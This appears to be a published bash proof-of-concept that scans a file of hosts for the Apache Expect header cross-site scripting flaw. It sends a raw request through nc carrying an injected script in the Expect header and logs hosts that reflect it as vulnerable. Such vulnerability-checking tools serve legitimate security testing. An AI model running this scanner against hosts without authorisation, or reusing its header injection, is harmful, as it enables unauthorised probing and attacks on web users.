Apache EXPECT Header XSS POC

A proof of concept for the Apache EXPECT header XSS

#!/usr/bin/env bash
#
# Check Apache EXPECT Header XSS against a list of hosts running web server 
# Takes Argument 1 a file which contains a list of host (in format: hostname/IP PORT)
# Output a file with host(s) found to be vulnerable
#
#  ./xss_apache_expect.sh hosts_file
#
#  sample content of hosts_file (line by line)
#
#  yehg.org 80
#  127.0.0.1 80
#
 
echo ++++++++++++++++++++++++++++++++++++
echo Apache EXPECT Header XSS POC
echo by Aung Khant, aungkhant[at]yehg.net, http://yehg.net
echo ++++++++++++++++++++++++++++++++++++
echo 
 
if [ $# -ne 1 ]; then
  echo "Usage: ./$0 <hosts_file>>"
  exit
fi
 
IFS=$'\n';
 
for i in `cat $1`
do
 
sp1=`expr index $i " "`
sp2=`echo $sp1-1|bc`
host=`expr substr $i 1 $sp2`
port=${i:$sp1}
 
if  echo -en "GET / HTTP/1.1\nHost: $i\r\nConnection: close\r\nExpect: <script>alert(0)<script>\r\nContent-length: 0\r\nContent-length: 0\r\n\r\n" | nc -w 4 $host $port | grep -i '<script>alert(0)<script>' > /dev/null 
 then
   echo -en "[!] $host on port $port ... \E[31mVULNERABLE!\n"
   tput sgr0
   echo $i >> $hostfile-apache-expect-xssed
else
   echo -en "[+] $host on port $port ... \E[32mOK\n"
   tput sgr0
fi
 
done
 
echo

Download

Submitted by Aung Khant